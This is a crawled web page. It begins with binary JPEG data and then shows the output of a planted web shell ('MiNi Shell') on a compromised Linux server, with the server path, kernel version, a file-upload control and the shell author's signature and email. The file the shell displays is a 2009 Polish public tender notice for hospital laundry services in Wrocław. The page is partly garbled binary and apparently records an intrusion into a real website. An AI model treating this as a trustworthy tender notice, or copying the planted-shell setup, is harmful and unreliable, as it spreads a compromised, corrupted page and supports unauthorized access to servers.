JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090825/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090825/139543-N-2009.html

<p class="kh_header"><b>Wrocław: 13A/PRAL/SZPOZ/2009</b><br>
<b>Numer ogłoszenia: 139543 - 2009; data zamieszczenia: 25.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Specjalistyczny Zespół Psychiatrycznej Opieki Zdrowotnej , ul. Wybrzeże Korzeniowskiego 18, 50-226 Wrocław, woj. dolnośląskie, tel. 071 3291460, faks 071 3293147.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 13A/PRAL/SZPOZ/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Zamówienie obejmuje wykonanie usługi prania: odzieży medycznej, odzieży ochronnej, odzieży roboczej, bielizny pościelowej, pościeli, materaców, kocy, piżam, koszul nocnych, szlafroków i innych ( np. obrusy, firany, worki na odzież) będących na stanie jednostki zwanych dalej bielizną 
3.	Zakres obowiązków Wykonawcy: 
3.1.	transport, naprawa uszkodzeń, moczenie, pranie, krochmalenie, suszenie, prasowanie, maglowanie, dezynfekcja, sortowanie i składanie bielizny z zachowaniem wymogów Państwowego Zakładu Higieny i Państwowej Inspekcji Sanitarnej;
3.2.	poddanie procesowi prania, czyszczenia i dezynfekcji materacy, poduszek i innego asortymentu;
3.3.	składanie i pakowanie pakietami wg komórek organizacyjnych Zamawiającego np. Oddział I stacjonarny, Oddział II Dzienny, czystej bielizny w przezroczysty worek foliowy lub zgrzewania w folię;
3.4.	postępowanie z bielizną w zależności od stopnia zagrożenia epidemiologicznego z uwzględnieniem następujących zasad:
a)	zminimalizowanie narażenia pracowników Zamawiającego i Wykonawcy oraz środowiska na zanieczyszczenia drobnoustrojami pochodzącymi z bielizny (ograniczenie kontaktu, odizolowanie zanieczyszczonej bielizny zarówno u Zamawiającego jak i w zakładzie Wykonawcy),
b)	stosowanie standardów postępowania w celu ochrony pracowników Zamawiającego i Wykonawcy przed ekspozycją na zakaźny lub potencjalnie zakaźny materiał w czasie kontaktowania się z brudną bielizną,
c)	rozładunek i załadunek odbieranej i dostarczanej bielizny do miejsca jej czasowego magazynowania w obiektach Zamawiającego 
d)	zapewnienia odpowiedniego ubioru pracownika Wykonawcy dostarczającego i odbierającego bieliznę od Zamawiającego tj. fartuch ochronny i rękawice ochronne.
3.5.	prowadzenia wewnętrznego systemu kontroli jakości świadczonej usług. 
4.	Wykonawca zobowiązany jest na własny koszt do:
4.1.	zapewnienia przeźroczystych worków foliowych (lub folii do zgrzewania) przeznaczonych do pakowania czystej bielizny,
4.2.	odbioru brudnej bielizny z magazynów bielizny brudnej w obiektach Zamawiającego tj. przyziemie budynku G, w godzinach 1300 - 1400 w poniedziałek, środę i piątek. Bielizna brudna zapakowana będzie w worki foliowe oznaczone spisem bielizny zgodnie  z załącznikiem nr 2.3 do Umowy.
4.3.	dostarczenia czystej bielizny do magazynu bielizny czystej w obiektach Zamawiającego tj.  przyziemie budynku G, w godzinach 1200 - 1300 w poniedziałek, środę i piątek. Bielizna czysta zapakowana będzie w przezroczyste worki foliowe lub zgrzewaną folię przezroczystą z oznaczeniem komórki organizacyjnej Zamawiającego z której pochodzi.
4.4.	ścisłe przestrzeganie godzin odbioru i dostawy bielizny przy czym Zamawiający zastrzega sobie prawo zmian godzin dostarczania i odbioru bielizny.
4.5.	sortowania i segregowania bielizny czystej zgodnie z oznaczeniem umieszczonym na bieliźnie,
4.6.	postępowania z bielizną w zależności od stopnia zagrożenia mikrobiologicznego zgodnie z podziałem:
a)	bielizna brudna - jest używaną bielizną, ale nie zanieczyszczoną i nie zakażoną, która wymaga prania i dezynfekcji termicznej, 
b)	bielizna skażona - jest używaną bielizną zanieczyszczoną wydalinami, wydzielinami, krwią lub płynami ustrojowymi - wymaga prania, dezynfekcji chemicznej i termicznej.
c)	bielizna termowrażliwa - bielizna ulegająca uszkodzeniu w normalnych procesach prania i dezynfekcji termicznej (poduszki, koce, materace), wymaga stosowania innych technologii prania.
4.7.	Stosowania środków chemicznych piorących i dezynfekujących (w uzgodnieniu z Działem Organizacji i Nadzoru Zamawiającego) w celu zapewnienia:
a)	prawidłowego poziomu czystości mikrobiologicznej bielizny,
b)	poziomu bieli bielizny,
c)	trwałości koloru bielizny,
d)	wytrzymałości bielizny na rozciąganie,
5.	Zwrot odebranej do prania brudnej bielizny w tym: ubrań roboczych, materacy, kocy, poduszek itp. odbywać się będzie przy następnym transporcie tzn. bielizna wydana do pralni w poniedziałek wraca czysta do magazynu bielizny Zamawiającego w środę. Przyjęcie i zwrot bielizny odbywać się będzie poprzez podpisanie karty ewidencji bielizny   zgodnie z  załącznikiem nr 2.4 do Umowy.
6.	Wykonawca odpowiada za bieliznę Zamawiającego od momentu odebrania jej z magazynu bielizny brudnej, do czasu przekazania jej do magazynu czystej bielizny. Wszelkie straty (zniszczenia lub zagubienia) powstałe na wskutek świadczonej usługi Wykonawca jest zobowiązany usunąć, a w razie potrzeby ponieść koszty związane z zakupem nowej bielizny dla SZPOZ.
7.	Wykonawca zobowiązuje się do:
7.1.	przestrzegania przepisów obowiązujących w pralniach świadczących usługi dla zakładów opieki zdrowotnej.
7.2.	transportowania bielizny w kontenerach zapewniających niezawodność dostaw oraz spełniających wymagania przepisów higieniczno - sanitarnych (bielizna czysta zapakowana w worki foliowe),
7.3.	transportowania odzieży roboczej czystej na wieszakach zafoliowanych w pozycji wiszącej,
7.4.	wyposażenia samochodów w przedziały na kontenery z bielizną brudną i czystą,
7.5.	dostarczenia na wezwanie Zamawiającego wyników badań czystości pod względem mikrobiologicznym bielizny czystej.
8.	Wymagania dotyczące wykonania usługi - Wykonawca zobowiązany jest w ofercie przetargowej:
8.1.	przedstawić stosowane przez siebie standardy, procedury lub instrukcje postępowania dotyczące technologii prania, czyszczenia, dezynfekcji, transportu, pakowania itp., wraz z ich wykazem,
8.2.	potwierdzić technologię prania, dezynfekcji chemiczno - termicznej stosownymi certyfikatami PZH i Państwowego Inspektora Sanitarnego  
8.3.	przedstawić wykaz środków piorących i dezynfekujących wraz z atestami  
9.	Wykonawca zobowiązuje się w przypadku awarii lub innych zdarzeń losowych, których nie był w stanie przewidzieć, do:
9.1.	bezzwłocznego powiadomienia Zamawiającego o zaistniałych trudnościach w zakresie terminowego wykonania usługi,
9.2.	zabezpieczenia przez innego Wykonawcę wykonania usługi, na koszt Wykonawcy.
10.	Zasady obiegu bielizny brudnej:
10.1.	brudna bielizna oraz odzież robocza i ochronna zdawana przez pracownika Zamawiającego do magazynu bielizny brudnej musi być oznakowana i opisana na spisie bielizny rzeczy zgodnie z  załącznikiem nr 2.3 do Umowy.
10.2.	pakowanie bielizny brudnej:
a)	brudna bielizna z oddziałów szpitalnych - umieszczana w worki foliowe koloru niebieskiego,
b)	brudna odzież robocza i ochronna - umieszczana w worki foliowe przezroczyste, 
c)	materace, koce, poduszki - opakowane w przezroczystą folię,
d)	skażona bielizna z oddziałów szpitalnych - umieszczana w workach foliowych koloru czerwonego. 
10.3.	w przypadku zdania do prania bielizny uszkodzonej fakt ten pracownicy Wykonawcy i Zamawiającego muszą odnotować w karcie przyjęcia poprzez oznaczenie literą U
11.	Zasady obiegu czystej bielizny:
11.1.	czysta bielizna zostanie dostarczona przez Wykonawcę własnym transportem do magazynu bielizny czystej w szczelnych i nieuszkodzonych opakowaniach,
11.2.	czysta bielizna zostanie posortowana i posegregowana zgodnie ze znakiem poszczególnych oddziałów, komórek organizacyjnych Zmawiającego,
11.3.	czysta bielizna zostanie sprawdzona, przeliczona w przeźroczystych workach foliowych (bez rozrywania opakowania) przez pracownika Wykonawcy w magazynie bielizny czystej oraz przez upoważnionego pracownika Zamawiającego, który potwierdzi fakt przyjęcia na karcie ewidencji pościeli/bielizny  zgodnie z załącznikiem nr 2.4 do Umowy.
11.4.	na podstawie potwierdzonych kart ewidencji Wykonawca wystawia fakturę wraz z załącznikiem, na którym wyszczególnione są daty odebrania bielizny szpitalnej od Zamawiającego, nazwy komórek organizacyjnych oraz kwota netto i brutto za wykonaną usługę.
11.5.	czysta odzież robocza i ochronna musi być dostarczana do magazynu czystego na wieszakach, zabezpieczona foliowymi pokrowcami ochronnymi.
11.6.	bieliznę czystą należy bezwzględnie chronić przed powtórnym zanieczyszczeniem w pralni, w czasie transportu i w czasie magazynowania.
12.	Zakres obowiązków i uprawnień Zamawiającego
12.1.	do obowiązków Zamawiającego należy:
a)	przestrzeganie godzin zdania i odbioru bielizny czystej i brudnej,
b)	znakowanie bielizny, 
c)	przestrzeganie zasad pakowania bielizny,
d)	przeprowadzanie kasacji bielizny.
12.2.	Zamawiający ma prawo do okresowej kontroli jakości wykonywanej usługi, w ramach audytu dostawcy zewnętrznego, z uwzględnieniem:
a)	usunięcia brudu i zaplamień z bielizny,
b)	stopnia zszarzania bielizny,
c)	wilgotności bielizny,
d)	zapachu bielizny,
e)	jakości maglowania i składania bielizny,
f)	   ilości bielizny.
12.3.	reklamacja będzie zgłaszana na druku reklamacji zgodnie z załącznikiem nr 2.5 do Umowy i rozstrzygana przez Wykonawcę w terminie 24 godzin od momentu zgłoszenia dokonanego przez Zamawiającego.
13.	 Wykonawca zobowiązany jest do naprawy (zaszyć, zacerować itp.) bielizny oznaczonej w załączniku 2.3 do Umowy jako uszkodzona.
14.	W przypadku złożenia oferty, która będzie stanowić czyn nieuczciwej konkurencji w rozumieniu ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2003 r. Nr 153, poz. 1503), w szczególności czyn polegający na utrudnianiu innym przedsiębiorcom dostępu do rynku przez działanie mające na celu wymuszenie na klientach wyboru jako kontrahenta określonego przedsiębiorcy lub stwarzanie warunków umożliwiających podmiotom trzecim wymuszanie zakupu towaru lub usługi u określonego przedsiębiorcy, Zamawiający odrzuci ofertę na podstawie art. 89 ust. 1 pkt 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych ( Dz. U. z 2007 r. Nr 223, poz. 1655)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu zobowiązany jest do wniesienia wadium w kwocie 1500 zł. 
2.	Wadium wnosi się przed upływem terminu składania ofert.
3.	Wadium może być wniesione w następujących formach:
a)	pieniądzu;
a)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
a)	gwarancjach bankowych;
a)	gwarancjach ubezpieczeniowych;
a)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z póżn. zm.).
4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego: Bank Zachodnim WBK S.A. Wrocław 58 1090 2473 0000 0006 2403 5919.
5.	Wadium wnoszone w pozostałych formach należy złożyć w formie oryginału w siedzibie Zamawiającego ul. Wybrzeże J. C. Korzeniowskiego 18, 50-226 Wrocław, Sekretariat ( godz. Otwarcia 7.30 - 14.30) najpóźniej w terminie składania ofert. 
6.	W przypadku wnoszenia wadium w formie gwarancji, z jej treści musi jednoznacznie wynikać, jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez upełnomocnionego przedstawiciela Gwaranta. Z treści powinno wynikać bezwarunkowe na każde pisemne żądanie zgłoszenie przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu kwoty wadium w okolicznościach określonych przepisami Art. 46 ust. 4a i ust. 5 ustawy. 
7.	Do oferty należy dołączyć kserokopię potwierdzonego za zgodność z oryginałem dokumentu stanowiącego wadium przetargowe.
8.	Wykonawca, który nie zabezpieczy oferty wadium zostanie wykluczony z postępowania. 
9.	Zwrot wadium nastąpi w trybie i okolicznościach określonych w art. 46 ustawy .<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.	Ocena spełnienia  warunków wskazanych w pkt 1 dokonana zostanie przez komisję przetargową na druku ZP - 17 zgodnie z ustawą  oraz niniejszą specyfikacją istotnych warunków zamówienia na podstawie złożonych dokumentów przez Wykonawcę..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
2.	Aktualny odpis z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
3.	Aktualne zaświadczenie właściwego Naczelnika Urzędu Skarbowego oraz właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
4.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie otwarto jego likwidacji ani nie ogłoszono upadłości.
5.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Przepis pkt. 2 i 3 stosuje się odpowiednio.
6.	Zasady składania ofert wspólnych przez przedsiębiorców:
1)	Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia publicznego (konsorcja, spółki cywilne) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty. Umocowanie może wynikać z treści umowy konsorcjum lub spółki cywilnej (w przypadku złożenia oferty przez spółkę cywilną), 
2)	w przypadku złożenia oferty wspólnej, w Formularzu oferty pełnomocnik zaznacza nr postępowania   i w czyim imieniu występuje.
3)	wszystkie dokumenty i oświadczenia składające się na ofertę muszą być podpisane lub poświadczone za zgodność z oryginałem przez pełnomocnika.
4)	wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem.
7.	Pełnomocnictwo winno zawierać co najmniej:
1)	określenie celu gospodarczego,
2)	oświadczenia podmiotów o przyjęciu odpowiedzialności solidarnej,
3)	wskazanie pełnomocnika podmiotu upoważnionego do reprezentowania w postępowaniu podmiotów występujących wspólnie (wraz z wymienieniem nazwy i adresu siedziby tych podmiotów) lub reprezentowania ich w postępowaniu i do zawarcia umowy.
4)	pełnomocnictwo musi być podpisane (wystawione) przez uprawnionych przedstawicieli wszystkich Wykonawców występujących wspólnie i udzielających pełnomocnictwa.
5)	pełnomocnictwo winno odpowiadać wymogom prawa polskiego.
8.	Polisa ubezpieczeniowa lub inny dokument potwierdzający, że wykonawca jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej 100 000 zł wraz z potwierdzeniem dokonania opłaty polisy.
9.	Wykaz, co najmniej 2 wykonanych lub wykonywanych usług prania bielizny szpitalnej w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia dokumentów potwierdzających, że usługi te zostały wykonane należycie zgodnie z załącznikiem nr 5 do SIWZ. Wykaz musi być podpisany przez osoby upoważnione do reprezentowania Wykonawcy.
10.	Oświadczenie o spełnieniu warunków udziału w postępowaniu wg wzoru zawartego w zał. nr 3 do SIWZ - podpisane przez Wykonawcę.
11.	Podpisany przez Wykonawcę formularz ofertowy według załącznika nr 1 do SIWZ.
12.	Pełnomocnictwo do podpisania oferty - dot. podpisania oferty przez osobę upoważnioną przez Wykonawcę.
13.	Oświadczenie o akceptacji wymagań określonych w  SIWZ i załącznikach do niej - poprzez podpisanie formularza ofertowego..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://szpoz.ibip.wroc.pl/public/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Organizacji i Nadzoru w godz. od 8.00 do 14.00 
Koszt  SIWZ - 20 zł - płatne w kasie SZPOZ
ul. Wybrzeże J. C. Korzeniowskiego 18, 50-226 Wrocław
lub za zaliczeniem pocztowym + opłata pocztowa.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2009 godzina 10:00, miejsce: Specjalistyczny Zespół Psychiatrycznej Opieki Zdrowotnej
      ul. Wybrzeże J. C. Korzeniowskiego 18, 50-226 Wrocław
      Sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com